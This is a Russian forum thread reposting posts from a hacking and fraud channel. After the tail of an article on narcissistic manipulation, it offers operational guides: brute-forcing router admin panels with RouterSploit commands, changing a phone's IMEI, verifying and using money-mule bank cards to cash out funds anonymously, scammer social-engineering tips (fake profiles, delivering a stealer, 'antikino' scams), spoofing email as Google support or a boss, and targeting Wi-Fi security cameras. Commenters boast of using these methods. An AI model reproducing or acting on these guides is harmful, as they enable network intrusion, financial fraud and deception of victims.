Насильники нередко прибегают к “тактике пылесоса”, как бы “засасывая” свою жертву обратно сладкими обещаниями, поддельными раскаяниями и пустыми словами о том, как они изменяться, только чтобы подвергнуть ее новым издевательствам. В больном сознании обидчика эта проверка границ служит наказанием за попытку противостоять насилию, а также за возвращение к нему. Когда нарцисс пытается начать всё “с нуля”, укрепите границы еще сильнее, а не отступайте от них.
Помните: манипуляторы не реагируют на эмпатию и сочувствие. Они реагируют только на последствия.
17. Агрессивные уколы под видом шуток
Скрытые нарциссы любят говорить вам гадости. Они выдают их за “просто шутки”, как бы оставляя за собой право отпускать отвратительные комментарии, сохраняя при этом невинное спокойствие. Но стоит вам разозлиться грубым, неприятным замечаниям, как они обвиняют вас в отсутствии чувства юмора. Это распространенный прием при словесных оскорблениях.
Манипулятора выдает презрительная ухмылка и садистский блеск в глазах: подобно хищнику, играющему с добычей, он получает удовольствие от того, что может безнаказанно обижать вас. Это ведь всего лишь шутка, так? Не так. Это способ внушить вам, что его оскорбления – всего лишь шутка, способ перевести разговор с его жестокости на вашу мнимую сверхчувствительность. В таких случаях важно стоять на своем и дать понять, что вы не потерпите такого обращения.
Когда вы обратите внимание манипулятора на эти скрытые оскорбления, он запросто может прибегнуть к газлайтингу, но продолжайте отстаивать свою позицию, что его поведение неприемлемо, а если не поможет, прекращайте с ним общение.
18. Снисходительный сарказм и покровительственный тон
Принижение и унижение других – сильная сторона деструктивного человека, и тон голоса – лишь один из многих инструментов в его арсенале. Отпускать в адрес друг друга саркастические ремарки бывает весело, когда это взаимно, но нарцисс прибегает к сарказму исключительно как к способу манипуляции и унижения. А если вас это задевает, значит, вы “излишне чувствительны”.
Ничего, что сам он закатывает истерики всякий раз, когда кто-то осмеливается критиковать его раздутое эго, – нет, это именно жертва сверхчувствительна. Когда к вам постоянно относятся как к ребенку и оспаривают каждое ваше высказывание, у вас развивается естественная боязнь выражать свои чувства, не опасаясь выговора. Такая самоцензура избавляет насильника от необходимости затыкать вам рот, потому что вы делаете это самостоятельно.
Столкнувшись со снисходительной манерой поведения или покровительственным тоном, четко и ясно заявите об этом. Вы не заслужили того, чтобы с вами говорили, как с ребенком, и уж тем более вы не обязаны молчать в угоду чьей-то мании величия.
“Как тебе не стыдно!” – любимая присказка деструктивных людей. Хотя ее можно услышать и от людей вполне нормальных, в устах нарцисса и психопата пристыжение – действенный метод борьбы со всякими взглядами и поступками, угрожающими их безраздельной власти. Он также применяется, чтобы уничтожить и свести на нет чувство собственного достоинства жертвы: если жертва осмелится чем-то гордиться, то внушение ей стыда за этот конкретный признак, качество или достижение может понизить ее самооценку и на корню задушить всякую гордость.
Нарциссы, социопаты и психопаты любят использовать ваши раны против вас самих; они могут даже добиться того, что вам будет стыдно за перенесенные вами обиды или насилие, нанося вам новую психологическую травму. Вы пережили насилие в детстве? Нарцисс или социопат будет внушать вам, что вы это каким-то образом заслужили, или хвастать о собственном счастливом детстве, чтобы вызвать у вас чувства неадекватности и ничтожности. Разве можно придумать лучший способ обидеть вас, чем расковырять старые раны? Как врач наоборот, деструктивный человек стремится углубить вашу рану, а не залечить ее.
Если вы подозреваете, что имеете дело с деструктивным человеком, постарайтесь скрыть от него свои уязвимые стороны или давние психотравмы. Пока он не докажет, что ему можно доверять, не стоит сообщать ему сведения, которые могут быть потом использованы против вас.
Самое главное: деструктивные люди стремятся контролировать вас любым доступным способом. Они изолируют вас, управляют вашими финансами и кругом общения, распоряжаются каждым аспектом вашей жизни. Но самый мощный инструмент в их арсенале – это игра на ваших чувствах.
Именно поэтому нарциссы и социопаты создают конфликтные ситуации на ровном месте, лишь бы вы чувствовали себя неуверенно и нестабильно. Именно поэтому они постоянно спорят по мелочам и злятся по малейшему поводу. Именно поэтому они эмоционально замыкаются, а потом снова кидаются вас идеализировать, как только чувствуют, что теряют контроль. Именно поэтому они колеблются между своей истинной и ложной сущностями, а вы никогда не чувствуете себя психологически безопасно, потому что не можете понять, что ваш партнер представляет собой на самом деле.
Чем больше власти они имеют над вашими эмоциями, тем сложнее вам будет доверять своим чувствам и осознавать, что вы стали жертвой психологического насилия. Изучив манипулятивные приемы и то, как они подрывают вашу веру в себя, вы сможете понять, с чем столкнулись, и хотя бы постараться восстановить контроль над собственной жизнью и держаться подальше от деструктивных людей

На этом все, друзья. Будьте аккуратны и не позволяйте подобным людям унизить и обидеть вас.
 

Вложения

  • IMG_20200627_012101_920.jpg
    IMG_20200627_012101_920.jpg
    48.2 KB · Просмотры: 0
IMG_20200629_082957_494.jpg


Как изменить IMEI на смартфоне без root-прав

Добрый вечер, друзья. Думаю, многие из вас знают, что IMEI — это уникальный идентификатор вашего телефона. Он содержит 15 цифр в десятичном представлении.

Чтобы изменить IMEI, вам нужно иметь телефон на процессоре MediaTek.

1. Сначала мы открываем приложение "Телефон".
2. Затем вводим *#*#3646633#*#*
3. Переходим во вкладку "Connectivity" -> "Radio Information" -> "Phone 1".
4. Для первой сим-карты вводим в поле:
AT+EGMR= 1,7,«IMEI»
Для второй:
AT+EGMR= 1,10,«IMEI»
5. После после "=" должен стоять пробел!
6. Нажимаем "Send".
7. Перезагружаем устройство.

Если не получается, то после AT+ нужно поставить пробел. IMEI установленные таким способом могут слетать после сброса телефона❗
 
IMG_20200629_210622_920.jpg


Как скачивать видео с YouTube без ограничений

Добрый вечер, друзья. Сегодня я вам покажу, как можно скачать видео с YouTube без рекламы, ограничений и в наилучшем качестве. Нам понадобится Termux.

1. Скачиваем необходимые пакеты
$ apt update && apt upgrade -y && apt install python git -y
$ pip install pytube3
2. Клонируем репозиторий
$ git clone
3. Переходим в директорию и запускаем
$ cd YTDownload
$ python YTDwnload.py

Если вы хотите скачать одно видео, то просто вставляйте ссылку. Чтобы скачать много видео, нужно создать файл со ссылками, каждая из которых должна быть с новой строки. После скачивания видео будут храниться в папке Vidosiki.
 
IMG_20200702_094658_824.jpg

Защита WIFI сети от злоумышленников.
IMG_20200702_094658_824.jpg
ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
В данном материале вы узнаете что такое защита WIFI сети от злоумышленников и как активно противостоять хакерам которые пытаются взломать ваш роутер.
Основы защиты беспроводных сетей
Безопасность беспроводной сети специально создана для того, чтобы неавторизованные пользователи не могли получить доступ к вашей беспроводной сети и украсть конфиденциальную информацию. Тип беспроводной безопасности, которую использует отдельный пользователь, определяется его беспроводным протоколом.
Сегодня многие дома и компании работают и полагаются на беспроводные сети. Wi-Fi невероятно эффективен для поддержания пользователей подключенными к интернету 24 часа в сутки каждый день недели. Вышеупомянутое преимущество в сочетании с тем, что он поставляется без помех, делает беспроводную сеть еще более привлекательной.
Однако есть и другая сторона, поскольку сигналы Wi-Fi могут транслироваться за пределами дома или компании. Это означает, что Wi-Fi уязвим для хакеров; увеличивая легкий доступ людей в соседних домах или даже людей на соседней парковке. Вот тут-то и возникает важность обеспечения надежной беспроводной безопасности.
Вы можете задаться вопросом, что представляет собой опасность, если она вообще существует, для других людей, имеющих доступ к вашему Wi-Fi. Ну, есть ряд опасностей для уязвимой беспроводной сети. Например, хакеры смогут получить доступ к личной информации, украсть вашу личность и использовать ее против вас. Были случаи, когда люди попадали в тюрьму за преступление, которое они не совершали через интернет.
Когда другие люди смогут получить доступ к вашему Wi-Fi, скорее всего, ваш ежемесячный счет резко возрастет. Кроме того, другие люди, использующие ваше Wi-Fi соединение без вашего разрешения, значительно снизят скорость доступа в Интернет. В современную цифровую эпоху, когда Интернет является местом, где живут недобросовестные люди, безопасность Wi-Fi не может быть занижена.
Нетрудно защитить ваш Wi-Fi. В этой статье мы расскажем вам, как эффективно защитить сеть Wi-Fi и защитить себя и всех остальных пользователей в вашем доме или офисе от взлома. Первый шаг — рассмотреть тип безопасности вашего Wi-Fi.
Какого типа безопасности имеет ваш WiFi?
Первый шаг к тому, как обезопасить сети Wi-Fi от неавторизованных пользователей, — проверить тип безопасности, используемый вашей Wi-Fi.

Примечательно, что существует как минимум четыре беспроводных протокола, которые включают в себя:
Wired Equivalent Privacy (WEP)
Защищенный доступ Wi-Fi (WPA)
Защищенный доступ Wi-Fi 2 (WPA 2)
Защищенный доступ Wi-Fi 3 (WPA 3)
Прежде чем мы сможем подробно изучить упомянутые выше беспроводные протоколы, важно научиться определять тип используемой беспроводной безопасности. Помните, что тип вашей беспроводной сети будет WEP, WPA, WPA2 или WPA3. Ниже приведены инструкции по проверке типа используемой беспроводной безопасности:
Зайдите в настройки подключения Wi-Fi на вашем телефоне
В списке доступных сетей найдите свою конкретную беспроводную сеть.
Нажмите на нее, чтобы получить доступ к конфигурации сети
Конфигурация сети должна указывать тип используемой вами беспроводной защиты.
Если вы не можете выполнить вышеупомянутые действия на своем телефоне, попробуйте получить доступ к настройкам Wi-Fi на беспроводном маршрутизаторе.
Если у вас возникли проблемы, обратитесь за помощью к вашему интернет-провайдеру.
Однако более простой способ проверки на шифрование — использование приложения, известного как NetSpot, которое считается лучшим в отрасли. После того, как вы определили тип безопасности вашего Wi-Fi, вы должны убедиться, что он использует эффективный беспроводной протокол.
Что такое беспроводные протоколы безопасности?
Беспроводные протоколы предназначены для защиты беспроводных сетей, используемых в домах и зданиях других типов, от хакеров и неавторизованных пользователей. Как упоминалось ранее, существует четыре протокола безопасности беспроводной сети, каждый из которых отличается по силе и возможностям. Беспроводные протоколы также шифруют личные данные, передаваемые по радиоволнам. Это, в свою очередь, защищает ваши личные данные от хакеров и непреднамеренно защищает вас.
Ниже подробно рассматривается тип беспроводных протоколов, о которых должен знать каждый:
Wired Equivalent Privacy (WEP): это первый протокол безопасности беспроводной связи, когда-либо разработанный. Несмотря на то, что он был разработан в 1997 году, он все еще используется сегодня. Несмотря на это, он считается наиболее уязвимым и наименее безопасным протоколом безопасности беспроводной сети.
Защищенный доступ Wi-Fi (WPA): этот беспроводной протокол безопасности предшествует WEP. Следовательно, он предназначен для устранения недостатков, обнаруженных в протоколе WEP. В частности, для шифрования используется протокол целостности временного ключа (TKIP) и предварительный ключ (PSK).
Защищенный доступ Wi-Fi 2 (WPA 2): WPA 2, преемник WPA, обладает расширенными функциями и возможностями шифрования. Например, WPA 2 использует протокол кода аутентификации цепочки сообщений (CCMP) шифровального режима счетчика вместо (TKIP). Известно, что эта функция замены эффективна при шифровании данных. Следовательно, WPA 2 считается лучшим протоколом безопасности беспроводной сети.
Защищенный доступ Wi-Fi 3 (WPA 3): это недавний беспроводной протокол. Он улучшен с точки зрения возможностей шифрования и защиты хакеров от частных и общедоступных сетей.
Учитывая вышеприведенную информацию, было бы лучше убедиться, что ваш беспроводной протокол является WPA 2 или WPA 3. Если это не так, вы можете легко изменить свой протокол Wi-Fi на WPA 2. Никогда не используйте WEP для шифрования вашего беспроводная сеть, так как она очень слабая и неэффективная в лучшем случае.
Теперь, учитывая все вышесказанное, ниже приведены лучшие советы по безопасности WiFi.
Проверка мошеннических точек доступа Wi-Fi. Мошеннические точки доступа представляют серьезную угрозу безопасности, поскольку они обеспечивают доступ для хакеров. Лучший способ — провести опрос сайтов Wi-Fi в вашем доме или в здании компании. Лучшее приложение для этого — приложение NetSpot. Это приложение не только обнаруживает мошеннические точки доступа, но и эффективно избавляется от них.
Усиление шифрования Wi-Fi: чтобы усилить шифрование Wi-Fi, вам необходимо идентифицировать беспроводной протокол, как мы видели выше. Использование NetSpot поможет определить ваш тип шифрования.
Безопасный пароль WPA 2: Измените пароль WPA 2 на что-то незаметное. Чтобы убедиться, что ваш пароль надежный, используйте разные символы и цифры.
Скрыть имя сети. Идентификатор вашего набора служб или SSID часто настроен на передачу имени вашей беспроводной сети. Это увеличивает вашу уязвимость. Вы можете легко переключиться на «скрытый», что затруднит для кого-либо подключение к нему, если они не знают тогда название вашей беспроводной сети
 
IMG_20200702_210749_582.jpg


Как взломать админ-панель роутера и узнать пароль от Wi-Fi

Добрый день, друзья. На данный момент самым простым способом получить доступ к административной панели роутера является использование RouterSploit Framework. Он представляет из себя фреймворк с открытым исходным кодом, посвящённый эксплуатации встраиваемых устройств (роутеров, беспроводных точек доступа).

С помощью фреймворка можно выбрать подходящий тип авторизации в административную панель и запустить перебор по словарю.

1. Устанавливаем фреймворк:
$ git clone
$ cd routersploit
$ python3 -m pip install -r requirements.txt
$ python3 rsf.py

2. Для выполнения атаки необходимо выполнить следующие команды:
$ use creds/http_basic_bruteforce
$ set target 192.168.0.2
$ set passwords file:///usr/share/wordlists/nmap.lst
$ run

После успешного подбора авторизационных данных, вы можете зайти в панель настроек и найти пароль от Wi-Fi, как правило, в открытом виде. Вы также можете его поменять, отключить устройства, изменить настройки и многое другое.
 
IMG_20200703_090349_077.jpg


Как анонимно выводят деньги используя левые карты?

ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
Банковские карты
Эксплуатация карт сопряжена с серьезным риском краж денег дропом (человеком на которого оформлена карта).
Вероятность таких краж можно свести к минимуму, если соблюдать ряд мер предосторожности при покупке и эксплуатации карт.
Эти меры можно разделить на две группы:
1. Проверка карты
3. Проверка карты
До оплаты товара покупатель обязан проверить его по следующим параметрам:
1. Карта соответствует заказанной (то есть, что это виза голд, а не виза классик, к примеру).
2. Пин-код соответствует карте, то есть номер на конверте с пин-кодом совпадает с номером карты. Если нет конверта, проверить пин в банкомате.
3. Имеются все данные на дропа, необходимые для прозвона в банк, то есть паспортные данные и кодовое слово.
4. Приложена симка. Номер симки может совпадать с указанным в анкете, а может не совпадать. В последнем случае все выявляется при прозвоне в банк.
5. Имеются все данные, необходимые для входа в онлайн. Этот пункт касается только тех банков, в которых доступ в интернет-банк нельзя получить самостоятельно.
Проверка через интернет-банк.
Необходимо сделать следующее:
1. Зайти в интернет-банк при помощи приложенного логина и пароля или же данных, запрошенных вами самостоятельно.
2. Если логин и пароль были приложены - сменить логин и пароль.
3. Удостовериться, что разовые пароли приходят на приложенную симку.
4. Тщательно проверить через интернет-банк, не подключены ли левые симки, к примеру, к мобильному банку.
5. Проверить, нет ли дополнительных карт.
6. Проверить, нет ли у карт истории операций, то есть не использовались ли ранее карты на дропа другими заказчиками.
7. Проверить, нет ли у дропа кредитов.
8. Если позволяет интерфейс интернет-банка, поставить свою симку для смс-оповещения и доставки разовых паролей.
9. Особое внимание обращать на возможность подключения мобильного приложения для смартфонов. Если в интернет-банке перед этой услугой не стоит кнопка "подключить" или стоит отметка, что услуга подключена, необходимо позвонить в колл-центр и попросить отключить услугу. Затем позвонить и попросить подключить заново. Соответственно, сменятся логины и пароли для доступа.
Проверка через банкомат.
1. Вставить карту в банкомат, ввести пин-код, запросить баланс.
2. Сменить пин-коды. Это исключит использование дампов.
3. Если позволяет интерфейс банкомата, поставить свою симку для смс-оповещения и доставки разовых паролей. Это операция делается или через интернет-банк, или через банкомат, или же вообще не предусмотрена. об этом ниже.
4. Положить на карту 1000-5000 руб (сумма зависит от банка) и снять. Если снять не удается, карта, скорее всего, стоит на фрод-мониторинге.
Проверка через службу технической поддержки банка.
1. Позвонить и задать вопрос, допустим, о балансе по карте. Спросят кодовое слово. Цель - проверить правильность кодового слова.
2. Если в интернет-банке не видно, на какой номер установлено смс-оповещение, спросить у операциониста, установлено оно или нет, и если да, то на какой номер
Проверка сим-карты
1. Если нет возможности сменить сим-карту на свою ни через банкомат, ни через онлайн, то позвонить оператору и уточнить, не стоит ли на данной симке переадресация.
2. Если симка "Мегафон", проверить, чтобы не была подключена услуга "смс-плюс". Она позволяет читать смс удаленно, с другого устройства. Кроме того, ОБЯЗАТЕЛЬНО заходить в личный кабинет Сервис Гид и в обязательном порядке проверять подключение UMS
Только после проверки материала по всем пунктам покупателем,можно использовать карту . На проверку дается один день . Если речь идет о партиях свыше 10 карт, срок может быть продлен по обоюдной договоренности.
2. Эксплуатация карты.
1. Перед каждым заливом денег на карту повторить пункты: , 1.2.3 (если пароли на симку не приходят, заливать деньги нельзя до выяснения причины), 1.2.4 (дроп мог сменить номер для смс-оповещения), 1.2.5 (мог сделать дополнительные карты), 1.2.7 (мог взять кредит), 1.2.9 (мог подключить мобильное приложение), 1.3.1 (мог заблокировать карту), 1.3.4 (банк мог поставить карту на фрод-мониторинг или дроп мог отнести в банк платежное поручение на другую свою карту), 1.4.2 (если номер для смс-оповещения не виден в интернет-банке), 1.5.1 (если пользуетесь симкой, предоставленной селлером).
Обнаружение вышеобозначенных недостатков есть признак подготовки дропа к кидку и является основанием для замены карты.
2. Рекомендуется не заливать на карту сразу большие деньги. Если дроп придумал какой-то хитрый способ кидка, то, скорее всего, проколется и утащит, что есть.
3. Покупатель обязан снимать деньги с карты максимально быстро. Чем быстрее, тем меньше шансов у кидалы узнать, что деньги на счету. Максимальный срок нахождения денег на карте - 3 часа.
4. Если есть возможность, то ни в коем случае не заливать деньги по строго определенному графику, допустим, понедельник-среда-пятница. Потенциальный кидала может запросить в банке детализацию, узнать график и попробовать узнать момент поступления денег при помощи прозвона в банк.
5. Ни в коем случае не снимать смс-оповещение для входа в интернет-банк. В противном случае, сложно обнаружить смену этого номера нечестным дропом.
 
IMG_20200703_223646_423.jpg


Социальная инженерия в примерах

ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
Что такое социальная инженерия(СИ)?
Социальная инженерия - это своеобразное искусство. И овладевание им означает профит для злоумышленника и потерю денег, личной информации, и много чего ещё для жертвы социального инженера.
Обычно, соц инженерия используется вместе с техническими средствами. Однако, как доказал Кевин Митник, это не всегда так. Кто не слышал про Кевина Митника, тот, видимо, живёт на луне, и для того я объясню. Кевин Дэвид Митник — знаковая фигура в сфере информационной безопасности. Консультант по компьютерной безопасности, писатель, бывший компьютерный хакер. В конце Экс экс века был признан виновным в различных компьютерных и коммуникационных преступлениях. В 12 лет Кевин от одноклассника узнал множество способов мошенничества с телефоном, в частности, о том, что, действуя от имени другого человека, можно выпытать нужную информацию. Кевин научился перенаправлять сигнал домашнего телефона на таксофон, веселясь от того, что владельцев домашних телефонов перед разговором просили опустить 10 центов. Он совершал огромное количество взломов просто по телефону. Разумеется, одним телефоном он не ограничивался, в 17 лет он совершил свой первый взлом, он взломал школьную локальную сеть, но эта статья не о Кевине,поэтому про него закончим
Приёмы социальной инженерии
Провоцирование, оно же троллинг, это способ, при котором жертву выводят из себя, и в порыве гнева она не способна сдерживать информацию, соответственно, получить необходимую информацию тогда гораздо проще.
Пример
Ну это, как в сказке иван царевич и серый волк. Главный злодей был разозлён и из-за этого совершил грубейшую ошибку, сказал, что будет делать всё назло заложникам. Далее ему сказали, что-то вроде я буду очень зол если ты меня развяжешь. Пример грубоват, зато понятен будет всем.
Влюблённость
Влюблённость, это способ когда социальный инженер влюбляет в себя свою жертву, после чего аккуратно выуживает из неё всю информацию, а в особо “тяжёлых” случаях спрашивает напрямую.
Пример
Нечто подобное было описано в видео overbafer1, там он показывал, как создал страницу от имени девушки, нашёл потенциальную жертву, начал с ней переписку и через несколько аудиозаписей (ясно какого содержания) и некоторое время переписки, он уже мог получить очень многое, будь то 50 рублей на телефон или практически любую частную информацию.
Безразличие
Приём, при котором атакующий симулирует безразличие к какой либо теме, важной для жертвы. Нужно понимать, что не всегда человек будет переубеждать вас, а если вы скажете, что вам это не важно, а потом проявите интерес, это будет как минимум странно. Поэтому важно, чтобы жертва сама захотела вас переубедить!
Пример
У главы охранной компании банка есть подруга, и однажды этот глава разговорился с ней о своей работе, но она этот разговор прекратила, сказав, что ей неинтересна его работа, он же, любя и уважая свю работу, начал её переубеждать. Там как повезёт, либо он будет доказывать только на словах, либо и в банк проведёт, и коды от системы безопасности ей покажет.
Спешка
В этом способе манипулятор изображает, якобы нужно сделать всё быстро , тем самым отнимает у жертвы последнее время на раздумья. И она под гнётом спешки делает то, что нужно манипулятору.
Пример
Такое случается очень часто. Приходит СМС с текстом - “Мам, срочно, нужно 1000 рублей на этот номер”. Разумеется, если вы мужчина, вы не можете быть чьей либо матерью, вы посмеётесь и закроете сообщение. Но если вы мать, так ещё и немолодая, то вы , не раздумывая, отправите, скорее всего. А свою ошибку вы осознаете позже.
Здесь, всё проще некуда. Согласитесь, если вы долгое время (2-3 месяца) общаетесь с человеком, и знаете о нём всё, как вам кажется, вы доверяете ему. Если он у вас что-либо попросит вы, конечно, спросите, зачем ему это, однако в итоге скорее всего отправите ему то, что от вас требуется, будь то деньги (в адекватных пределах) или какая-либо информация.
У вас есть знакомый, с которым вы общаетесь около полугода, знаете где он живёт, как его зовут, его номер, говорили с ним по телефону, знаете его голос, даже видели несколько его фото, и тут он пишет, что ему нужно 1000 рублей, вам не сложно, но возникает вопрос - зачем? Ответ получен - нехватает на оплату кредита, притом он ранее говорил, что он взял кредит. Всё сходится, ему действительно нужны деньги - отправлю! Деньги отправлены, ровно также, как и вы в чёрный список. Конечно, не думаю, что злоумышленник за свои полгода времени потребует всего 1000 рублей, но смысл ясен.
Думаю, ясно, что не нужно доверять людям без какой либо проверки, даже если вы общаетесь с ним несколько месяцев. Также не стоит злится из-за каждого тролля в сети.
Доверяй, но проверяй
 
Как сгенерировать поддельный трафик

Добрый день, друзья. Если вы хотите затруднить жизнь тому, кто отслеживает ваш сетевой трафик, или сделать собираемые данные менее полезными, можно воспользоваться расширением Chaff, которое предназначено для генерирования поддельного трафика.

Chaff автономно просматривает случайные сайты с вашего IP, используя пользовательские URL, закладки и случайные поисковые запросы, тем самым создавая поддельный веб-трафик для маскировки настоящей истории посещений. Другими словами, сайты, которые вы посещаете сами, перемешаются с теми, которые генерирует расширение, и если кто-то отслеживает вашу историю посещений, ему будет трудно понять, какие именно сайты вы посещали из-за большого потока фейковой информации.

Вы также можете указать необходимые параметры, чтобы сделать трафик более или менее реалистичным.
 
Да это БОЛЬШЕ в оразовательных целях)) А так да, по старинке надежнее. Щас вот хочу одного "МУСОРКА" воткнуть методом "СОЦИАЛЬНОЙ ИНЖИНЕРИИ" прогреСС.
а старые методы братка что уже не работают ? )) я по старинке затрудняю жизнь клиенту ))
 
Если вы планируете сделку с его участием, мы настоятельно рекомендуем вам не совершать ее до окончания блокировки. Если пользователь уже обманул вас каким-либо образом, пожалуйста, пишите в арбитраж, чтобы мы могли решить проблему как можно скорее.
Посмотреть вложение 93486

Как отправлять письма с чужого Email

Добрый вечер, друзья. Если вы думаете, что электронные письма всегда приходят только от того, кто указан в графе отправителя, то вы сильно заблуждаетесь. На самом деле, электронную почту почти от любого отправителя достаточно легко подделать.

У данного сервиса присутствует возможность отправлять электронные письма с любого Email-а, добавляя вложения и шифрование. Дополнительно, присутствуют расширенные возможности отправки.

⚠ Вы можете отправить письмо с почты поддержки Google или от имени вашего начальника.

Настройка

1. Сперва переходим на сайт и активируем перевод страницы, если это требуется.
2. Теперь заполняем поля. Первое поле: имя отправителя. Второе поле: почта отправителя. Третья строка: принимающий адрес почты. Ну а дальше, тема письма и вложение.
3. Теперь вписываем само содержимое будущего письма.
4. Остаётся лишь пройти капчу и нажать кнопку «Послать».

Письмо успешно отправлено. Также можете заглянуть в раздел «Расширенные настройки», уверен, вы найдете пару интересных пунктов.

Посмотреть вложение 93489
Не робит к сожалению... Не приходит с [email protected] и c [email protected] на почту yandex, ни в спам, никуда :(

Снимок экрана 2020-07-05 в 11.57.45.png
 
IMG_20200706_084438_484.jpg

5 советов новичкам в Соц инженерии!

ВСЯ ИНФОРМАЦИЯ НА КАНАЛЕ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, МЫ НЕ ПРИЗЫВАЕМ К ДЕЙСТВИЯМ
Добрый день. Сегодня я вам дам небольшие советы по социальной инженерии. Для опытных работников эти советы навряд ли будут новые, но для начинающих это будет возможно открытием)
1. Ведите деловой стиль общения.
Много раз замечал, что те, кто только начали внедрятся в Соц. инженерию ведут диалог с жертвой, как со своим другом. Конечно это хорошо, вы располагаете жертву близко к себе, превращаясь даже в каком-то роде друзьями, знакомыми. Да, это нужно делать, но только если жертва сама этого хочет. Если она сделал первый шаг к близкому, дружескому общению - делайте и вы его тоже. Так вы сможете расположить как можно ближе жертву к себе и дать понять, что вы не обманите даже мышь. Но стоит не забывать о деловом стиле и грамотности, вы конечно можете общаться на Ты, но как я сказал ранее, лучше это делать в деловом стиле. (Исключением является Антикино.)
2. Шаблонные сообщения.
Работая в одном коллективе, я понял, что там очень много людей, которые используют шаблоны от их руководителей. Это конечно хорошо, что есть шаблоны, руководитель старается сделать всё проще. Но стоит не забывать, что обычно, шаблоны выдают сами себя. К примеру, по шаблону будет один стиль общения, а у вас совсем другой. Подозрительно будет, правда? Всегда переделывайте шаблон под ваш стиль общение, так будет менее заметно, что за основу вы взяли шаблонную фразу/сообщение.
3. Оформление страниц
Если вы хотите оформить к примеру свою фейк страницу ВК, фотографиями реальных людей, то советую вам сделать их зеркальными на любом сайте редактирования фото. Так будет сложнее пробить фото в Google или Яндексе. Берите сразу много фотографий, но все не заливайте, оставьте 2-3 штуки на всякий случай.
Если на вашей странице уже загружены фото, то используйте расширение "VkOpt". Оно вам поможет менять фотографии на страниц, без потери даты опубликования самой фотографии.
4. Манера общения
Никогда не торопите жертву (если конечно того не требуется). Если вы к примеру суёте ей стиллер, не пишите "Вот вам программа, держите, тестируйте - ". Сначала расположите жертву как можно ближе к себе. Спросите как к ней можно обращаться (пример - "Как я могу к вам обращаться? Андрей?") или "Вы сейчас заняты? Это потребует всего лишь около 10-ти минут вашего времени." Просто по задавайте всяких вопросов, да даже можете спросить как прошёл день. В общем, старайтесь как можно ближе расположить жертву к себе.
5. Антикино
Если у вас нет вообще знаний СИ, но вы узнали что то из моих пунктов, то вам уже можно идти на Антикино или как его ещё называют, Антик. Конечно вам там не потребуется деловой стиль общения и т.п. речевые обороты. Там вы справитесь и с самой обычной грамотностью в сообщениях. Лично мне кажется, это отличный способ заработка для тех, у кого нет особых знаний в СИ.
Я вас уверяю, если вы будете использовать выше перечисленные советы, то вы станете хорошим СИ инженером. Эта статья нужна только для внедрения в саму Соц. Инженерию и является только для тех, кто не знал выше перечисленные советы. Она очень краткая, и в ней присутствуют не все тонкие моменты общения с жертвой. Это будет в дальнейших статьях. Прошу не писать что вы уже это знали. Если знали - то значит что вы уже знаете основы и являетесь начинающим соц. инженером).
 
IMG_20200709_062140_002.jpg


Как скрыть данные в аудиофайле

Добрый день, друзья. Полагаю, что самый лучший способ спрятать какие-то данные - это воспользоваться методом стенографии. Данный способ позволяет скрыть информацию в абсолютно любом файле.

Это делает передачу и хранение конфиденциальных данных значительно безопаснее, ведь чтобы узнать, в каком файле находится информация, нужно проявить настоящую смекалку, а не надеяться на сторонние утилиты. Например, чтобы скрыть информацию в аудиофайле, можно воспользоваться программой DeepSound.

Шифровка?‍?

1. Устанавливаем DeepSound

2. Открываем программу. Нажимаем «Open carrier files». Указываем путь к исходному аудио-файлу.

3.Нажимаем «Add secret files». Выбираем любой файл.

4. Нажимаем «Encode secret files».

Декодируем файл

Открываем программу. Добавляем аудиофайл с закодированным сообщением и видим внизу секретные файлы, которые можем извлечь кнопкой "Extract secret files"
 
Отключаем камеры видеонаблюдения

be0a066bf5f7ae97b7a66.jpg


Тактика радиоэлектронной борьбы работает путем заклинивания, нарушения или отключения технологии, которую цель использует для выполнения критической функции, а устройства IoT особенно уязвимы для атак. Беспроводные камеры безопасности, такие как Nest Cam, часто используются для защиты критических мест, но хакер может хирургическим путем отключить веб-камеру или другое устройство, подключенное к Wi-Fi, не нарушая остальную сеть.
В целом, устройства IoT известны своими открытыми портами, паролями по умолчанию (и часто жестко заданными) и другими серьезными уязвимостями, которые потенциально может использовать любой, кто подключен к той же сети Wi-Fi. Если вы подключены к той же сети Wi-Fi, что и камера безопасности, или камера подключена к сети без пароля, можно сделать больше, чем просто отключить устройство. Это включает в себя попытку войти в саму камеру.
Несмотря на риск, который представляют устройства IoT, камеры и другие подключенные к Wi-Fi датчики продаются как способные обеспечивать безопасность или мониторинг многих важных вещей, что делает сети Wi-Fi, к которым они подключены, ценной целью для хакеров.
В то время как мы обсуждали, как использовать Airgeddon для полного подавления сетей Wi-Fi, полномасштабные атаки типа «отказ в обслуживании» не являются скрытыми и вызовут массовые сбои во всей сети, привлекая слишком много внимания к тому, что вы делаете. В некоторых случаях лучше ориентироваться на одно хост-устройство в конкретной сети, например на камеру безопасности Wi-Fi, не затрагивая всю сеть.
Хакер или пентестер может найти информацию во время разведки, которая показывает интересные устройства, подключенные к целевой сети. С помощью Kismet или Airodump-ng, пассивных инструментов восстановления Wi-Fi, он может идентифицировать точки доступа, которые активно обмениваются данными, считывать пакеты из эфира и отображать информацию об источнике. Затем целевую сеть можно разбить, чтобы увидеть отдельные источники пакетов, которыми обмениваются, иными словами, список каждого подключенного устройства.
Прогуляться по целевому объекту будет достаточно, чтобы уйти со списком всех беспроводных устройств, используемых в сети - без использования сетевого пароля. Из этого списка он или она может идентифицировать устройства по MAC-адресу, а также по другим сведениям о конфигурации Wi-Fi, таким как имена точек доступа по умолчанию.
Хотя вы ожидаете увидеть камеры безопасности Wi-Fi, подключенные термостаты, музыкальные проигрыватели, устройства потокового телевидения, пульты Wi-Fi и принтеры, встречаются менее распространенные устройства, подключенные к Wi-Fi. Это иллюстрируется возможностью идентифицировать и отобразить местоположение секс-игрушек с поддержкой Wi-Fi (практика, называемая «завинчивание»), которые либо используют приложение через Wi-Fi для управления устройством, либо, что более ужасно, для потоковой передачи видео с камера.
